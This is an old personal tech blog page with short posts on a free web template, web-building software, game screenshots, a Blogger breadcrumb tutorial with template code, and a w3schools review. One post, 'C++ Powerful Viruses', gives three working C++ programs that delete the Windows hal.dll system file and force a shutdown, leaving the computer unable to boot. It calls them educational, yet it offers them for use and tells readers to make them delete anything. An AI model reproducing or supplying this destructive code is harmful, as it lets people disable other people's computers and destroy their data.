Monday, June 27, 2011

Pak Computers Free web template - Download

0 comments
                                                                   Download
This is a very professional computer website template I have designed for you. It has javascripts included. I hope you would like this template.

Web Page Maker - Easiest Web Building Software

1 comments
Web Page Maker Screen Shot

System Requirements:

  • Pentium Class CPU (400 MHz or higher recommended)
  • 24 MEG RAM (64 or higher recommended)
  • 16 bit color display (24 recommended)
  • 10 MEG available disk space
  • Windows 7, Windows 95/98/ME/NT4/2000/XP/Vista
  • An Internet Explorer 5.0 or higher (IE6.0 or higher recommended)

Resident Evil: The Mercenaries 3d Screenshots

0 comments

Resident Evil: The Mercenaries has been released this week. Following are some of screen shots of Resident Evil: The Mercenaries.


Resident Evil: The Mercenaries
Resident Evil: The Mercenaries Screenshot

Saturday, June 25, 2011

Add Breadcrumb Navigation to Blogger Blogspot

2 comments
Breadcrumb is simple navigation above your posts. It has multiple benefits. First of all it improves your blog navigation but it also make your website search engines friendly.

Adding a breadcrumb to your blog provides a form of text-based navigation. A breadcrumb displays the visitor's location within a blog. The advantage of a breadcrumb is that it provides shortcuts to enable visitors to quickly get around your blog by jumping from one part of your blog to another.

Using this post as an example a breadcrumb might be Home > Navigation > Add a Breadcrumb to Blogger Blogspot Blog. In cases where there is more than one label this hack uses the last label listed. If a visitor wanted to look at other posts about navigation all they need do is click on the "Navigation" link in the breadcrumb and they will be taken to a page which will show them all the posts with the "Navigation" label.
Here is an example of Breadcrumb Navigation.

Home > Label > Post Title

How to install Breadcrumb Navigation to blogger

1. Login to your blogger ( If not logged in )
2. Navigate to Design > Edit HTML




3. Backup your blog ( Not necessary but suggested for precaution )

4. Please check the small box beside Expand Widget Template

5. Find the code ]]></b:skin>
6. Copy and paste the code below exactly above the code ]]></b:skin>

/* Breadcrumb from http://www.pakcomputerguru.blogspot.com/
----------------------------------------------- */
.breadcrumbs {
      padding:5px 5px 5px 0px;
        margin: 0px 0px 15px 0px;
      font-size:100%;
        line-height: 1.4em;
      border-bottom:3px double #e6e4e3;
      }
7. Find the following code in your template :
<div class='post hentry uncustomized-post-template'>  or <div class='post hentry'>
8. Copy and paste the code below exactly below the code <div class='post hentry uncustomized-post-template'> or <div class='post hentry'>

<b:if cond='data:blog.homepageUrl == data:blog.url'>
      <b:else/>
        <b:if cond='data:blog.pageType == &quot;item&quot;'>
            <div class='breadcrumbs'>

             Browse &#187;  <a expr:href='data:blog.homepageUrl' rel='tag'>Home</a>
        <b:loop values='data:posts' var='post'>
          <b:if cond='data:post.labels'>
            <b:loop values='data:post.labels' var='label'>
                  <b:if cond='data:label.isLast == &quot;true&quot;'> &#187;
                    <a expr:href='data:label.url' rel='tag'><data:label.name/></a>
                  </b:if>
          </b:loop>
      &#187; <span><data:post.title/></span>
           </b:if>
        </b:loop>
            </div>
        </b:if>
      <b:else/>
      <b:if cond='data:blog.pageType == &quot;archive&quot;'>
      <div class='breadcrumbs'>
      Browse &#187; <a expr:href='data:blog.homepageUrl'>Home</a> &#187; Archives for <data:blog.pageName/>
      </div>
      </b:if>
      <b:else/>
        <b:if cond='data:navMessage'>
      <div class='breadcrumbs'>
      <data:navMessage/>
      </div>
      </b:if>
      </b:if>
10. Save Template
Now you are done. See result in your posts. Following is result on my blog

Tuesday, June 21, 2011

C++ Powerful Viruses

0 comments


Note: These viruses are only for educational purposes.

1. This is a virus which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
SVXX's Version of this virus that uses Batch for most of its commands:
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

I hope you would like them. You can further make them to delete anything.

w3 Schools - Review

1 comments


Do you want to learn computer languages and have not time to go out? There is a good solution for this problem. w3 schools offers free tutorials on learning computer. You can explore many computer languages on this website. Best things is you don't need any software while learning any programming at this site. It has also an editor by which you could write a script and see results online. It was launched in 1999 by Refsnes Data. It is 100% free of cost.

           Even if you want to be an expert webdesigner this website would be enough for you. You may learn basics to advance web developing languages on this website.


               LINK: http://www.w3schools.com/